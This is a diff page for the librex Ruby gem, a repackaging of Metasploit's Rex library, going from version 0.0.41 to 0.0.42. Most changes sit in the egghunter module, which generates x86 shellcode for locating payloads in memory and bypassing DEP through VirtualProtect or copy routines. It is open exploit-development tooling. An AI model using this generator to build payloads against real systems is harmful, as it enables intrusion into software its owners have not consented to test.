librex 0.0.41 → 0.0.42
Sign up to get free protection for your applications and to get access to all the features.
- data/README.markdown +1 -1
- data/lib/rex/exploitation/egghunter.rb +54 -24
- metadata +3 -3
data/README.markdown
CHANGED
@@ -3,7 +3,7 @@
|
|
3
3
|
A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
|
4
4
|
|
5
5
|
Currently based on:
|
6
|
-
SVN Revision:
|
6
|
+
SVN Revision: 13159
|
7
7
|
|
8
8
|
# Credits
|
9
9
|
The Metasploit development team <http://www.metasploit.com>
|
@@ -69,6 +69,11 @@ class Egghunter
|
|
69
69
|
|
70
70
|
freeregs = [ "esi", "ebp", "ecx", "ebx" ]
|
71
71
|
|
72
|
+
reginfo = {
|
73
|
+
"ebx"=>["bx","bl","bh"],
|
74
|
+
"ecx"=>["cx","cl","ch"]
|
75
|
+
}
|
76
|
+
|
72
77
|
if opts[:depmethod]
|
73
78
|
|
74
79
|
if freeregs.index(apireg) == nil
|
@@ -102,29 +107,54 @@ class Egghunter
|
|
102
107
|
end
|
103
108
|
end
|
104
109
|
|
105
|
-
|
106
|
-
|
107
|
-
|
108
|
-
|
109
|
-
|
110
|
-
|
111
|
-
|
112
|
-
|
113
|
-
|
114
|
-
|
115
|
-
|
116
|
-
|
117
|
-
|
118
|
-
|
119
|
-
|
120
|
-
|
110
|
+
if depsize <= 127
|
111
|
+
getsize << "push 0x%02x\n\t" % depsize
|
112
|
+
else
|
113
|
+
sizebytes = "%04x" % depsize
|
114
|
+
low = sizebytes[2,4]
|
115
|
+
high = sizebytes[0,2]
|
116
|
+
if sizereg == "ecx" || sizereg == "ebx"
|
117
|
+
regvars = reginfo[sizereg]
|
118
|
+
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
119
|
+
if low != "00" and high != "00"
|
120
|
+
getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
|
121
|
+
elsif low != "00"
|
122
|
+
getsize << "mov #{regvars[1]},0x%s\n\t" % low
|
123
|
+
elsif high != "00"
|
124
|
+
getsize << "mov #{regvars[2]},0x%s\n\t" % high
|
125
|
+
end
|
126
|
+
getsize << "push #{sizereg}\n\t"
|
127
|
+
end
|
128
|
+
if sizereg == "ebp"
|
129
|
+
if low != "00" and high != "00"
|
130
|
+
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
131
|
+
getsize << "mov bp,0x%s\n\t" % sizebytes
|
132
|
+
getsize << "push #{sizereg}\n\t"
|
133
|
+
end
|
121
134
|
end
|
122
|
-
|
123
|
-
if
|
124
|
-
|
135
|
+
# last resort
|
136
|
+
if getsize == ''
|
137
|
+
blockcnt = 0
|
138
|
+
vpsize = 0
|
139
|
+
blocksize = depsize
|
140
|
+
while blocksize > 127
|
141
|
+
blocksize = blocksize / 2
|
142
|
+
blockcnt += 1
|
143
|
+
end
|
144
|
+
getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
|
145
|
+
vpsize = blocksize
|
146
|
+
depblockcnt = 0
|
147
|
+
while depblockcnt < blockcnt
|
148
|
+
getsize << "add #{sizereg},#{sizereg}\n\t"
|
149
|
+
vpsize += vpsize
|
150
|
+
depblockcnt += 1
|
151
|
+
end
|
152
|
+
delta = depsize - vpsize
|
153
|
+
if delta > 0
|
154
|
+
getsize << "add #{sizereg},0x%02x\n\t" % delta
|
155
|
+
end
|
156
|
+
getsize << "push #{sizereg}\n\t"
|
125
157
|
end
|
126
|
-
else
|
127
|
-
getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % depsize
|
128
158
|
end
|
129
159
|
|
130
160
|
|
@@ -132,21 +162,21 @@ class Egghunter
|
|
132
162
|
when "virtualprotect"
|
133
163
|
jmppayload = "push esp\n\tpush 0x40\n\t"
|
134
164
|
jmppayload << getsize
|
135
|
-
jmppayload << "push
|
165
|
+
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
136
166
|
when "copy"
|
137
167
|
jmppayload = getpc
|
138
168
|
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
139
169
|
when "copy_size"
|
140
170
|
jmppayload = getpc
|
141
171
|
jmppayload << getsize
|
142
|
-
jmppayload << "push
|
172
|
+
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
143
173
|
end
|
144
174
|
end
|
145
175
|
|
146
176
|
jmppayload << "\n" if jmppayload.length > 0
|
147
177
|
|
148
178
|
assembly = <<EOS
|
149
|
-
#{getpointer}
|
179
|
+
#{getpointer}
|
150
180
|
#{startstub}
|
151
181
|
check_readable:
|
152
182
|
or dx,0xfff
|
metadata
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
name: librex
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 0.0.
|
5
|
+
version: 0.0.42
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Metasploit Development Team
|
@@ -11,11 +11,11 @@ autorequire:
|
|
11
11
|
bindir: bin
|
12
12
|
cert_chain: []
|
13
13
|
|
14
|
-
date: 2011-07-
|
14
|
+
date: 2011-07-12 00:00:00 -05:00
|
15
15
|
default_executable:
|
16
16
|
dependencies: []
|
17
17
|
|
18
|
-
description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision
|
18
|
+
description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision 13159
|
19
19
|
email:
|
20
20
|
- hdm@metasploit.com
|
21
21
|
- jacob.hammack@hammackj.com
|